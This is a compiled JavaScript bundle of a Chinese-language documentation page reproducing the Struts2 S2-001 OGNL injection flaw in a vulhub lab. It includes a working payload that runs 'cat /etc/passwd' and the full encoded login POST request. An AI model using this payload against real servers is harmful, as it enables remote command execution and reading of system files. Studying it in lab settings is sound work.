-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathf184b3e1.b4b8bf40.js
1 lines (1 loc) · 4.98 KB
/
f184b3e1.b4b8bf40.js
1
(window.webpackJsonp=window.webpackJsonp||[]).push([[16],{83:function(e,t,n){"use strict";n.r(t),n.d(t,"frontMatter",(function(){return c})),n.d(t,"metadata",(function(){return i})),n.d(t,"rightToc",(function(){return o})),n.d(t,"default",(function(){return l}));var r=n(3),a=n(8),s=(n(0),n(94)),c={id:"s2-001",title:"s2-001\u6f0f\u6d1e\u590d\u73b0",description:null,keywords:["JavaScript","frontend","\u89c6\u9891\u6559\u7a0b","\u524d\u7aef"]},i={unversionedId:"dyk/struts2/s2-001",id:"dyk/struts2/s2-001",isDocsHomePage:!1,title:"s2-001\u6f0f\u6d1e\u590d\u73b0",description:"\u6f0f\u6d1e\u8bf4\u660e",source:"@site/docs\\dyk\\struts2\\s2-001.md",slug:"/dyk/struts2/s2-001",permalink:"/docs/dyk/struts2/s2-001",editUrl:"https://github.com/lesssafe/lesssafe.github.io/docs/dyk/struts2/s2-001.md",version:"current",sidebar:"dyk",previous:{title:"DYK\u8ba1\u5212\u7b80\u4ecb",permalink:"/docs/dyk/dyk-intro"}},o=[{value:"\u6f0f\u6d1e\u8bf4\u660e",id:"\u6f0f\u6d1e\u8bf4\u660e",children:[]},{value:"\u6f0f\u6d1e\u9a8c\u8bc1",id:"\u6f0f\u6d1e\u9a8c\u8bc1",children:[]},{value:"python\u811a\u672c\u5229\u7528\u5de5\u5177",id:"python\u811a\u672c\u5229\u7528\u5de5\u5177",children:[]}],d={rightToc:o};function l(e){var t=e.components,n=Object(a.a)(e,["components"]);return Object(s.b)("wrapper",Object(r.a)({},d,n,{components:t,mdxType:"MDXLayout"}),Object(s.b)("h3",{id:"\u6f0f\u6d1e\u8bf4\u660e"},"\u6f0f\u6d1e\u8bf4\u660e"),Object(s.b)("p",null,"\u8be5\u6f0f\u6d1e\u5176\u5b9e\u662f\u56e0\u4e3a\u7528\u6237\u63d0\u4ea4\u8868\u5355\u6570\u636e\u5e76\u4e14\u9a8c\u8bc1\u5931\u8d25\u65f6\uff0c\u540e\u7aef\u4f1a\u5c06\u7528\u6237\u4e4b\u524d\u63d0\u4ea4\u7684\u53c2\u6570\u503c\u4f7f\u7528OGNL\u8868\u8fbe\u5f0f%{value}\u8fdb\u884c\u89e3\u6790\uff0c\u7136\u540e\u91cd\u65b0\u586b\u5145\u5230\u5bf9\u5e94\u7684\u8868\u5355\u6570\u636e\u4e2d\u3002\u4f8b\u5982\u6ce8\u518c\u6216\u767b\u5f55\u9875\u9762\uff0c\u63d0\u4ea4\u5931\u8d25\u540e\u7aef\u4e00\u822c\u4f1a\u9ed8\u8ba4\u8fd4\u56de\u4e4b\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u7531\u4e8e\u540e\u7aef\u4f7f\u7528%{value}\u5bf9\u63d0\u4ea4\u7684\u6570\u636e\u6267\u884c\u4e86\u4e00\u6b21OGNL\u8868\u8fbe\u5f0f\u89e3\u6790\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u6784\u9020Payload\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u3002"),Object(s.b)("h3",{id:"\u6f0f\u6d1e\u9a8c\u8bc1"},"\u6f0f\u6d1e\u9a8c\u8bc1"),Object(s.b)("h4",{id:"\u9776\u573a"},"\u9776\u573a"),Object(s.b)("p",null,"\u4f7f\u7528vulhub\u8fdb\u884c\u590d\u73b0\nvulhub\u5730\u5740\uff1astruts2/s2-001"),Object(s.b)("h4",{id:"poc"},"POC"),Object(s.b)("pre",null,Object(s.b)("code",Object(r.a)({parentName:"pre"},{className:"language-java"}),'%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\n')),Object(s.b)("h4",{id:"\u8bf7\u6c42\u6570\u636e\u5305"},"\u8bf7\u6c42\u6570\u636e\u5305"),Object(s.b)("pre",null,Object(s.b)("code",Object(r.a)({parentName:"pre"},{className:"language-http"}),"POST /login.action;jsessionid=09504541EF4ABDD7F72CA76FFF36F735 HTTP/1.1\nHost: 192.168.75.140:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 590\nOrigin: http://192.168.75.140:8080\nConnection: close\nReferer: http://192.168.75.140:8080/\nCookie: JSESSIONID=09504541EF4ABDD7F72CA76FFF36F735\nUpgrade-Insecure-Requests: 1\n\nusername=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D&password=\n")),Object(s.b)("p",null,Object(s.b)("img",Object(r.a)({parentName:"p"},{src:"https://cdn.jsdelivr.net/gh/lesssafe/img@master/20210104184340.png",alt:null})),"\n",Object(s.b)("img",Object(r.a)({parentName:"p"},{src:"https://cdn.jsdelivr.net/gh/lesssafe/img@master/20210104184406.png",alt:null})),"\n",Object(s.b)("img",Object(r.a)({parentName:"p"},{src:"https://cdn.jsdelivr.net/gh/lesssafe/img@master/20210104184430.png",alt:null}))),Object(s.b)("h3",{id:"python\u811a\u672c\u5229\u7528\u5de5\u5177"},"python\u811a\u672c\u5229\u7528\u5de5\u5177"),Object(s.b)("p",null,"\u5f85\u66f4\u65b0"))}l.isMDXComponent=!0}}]);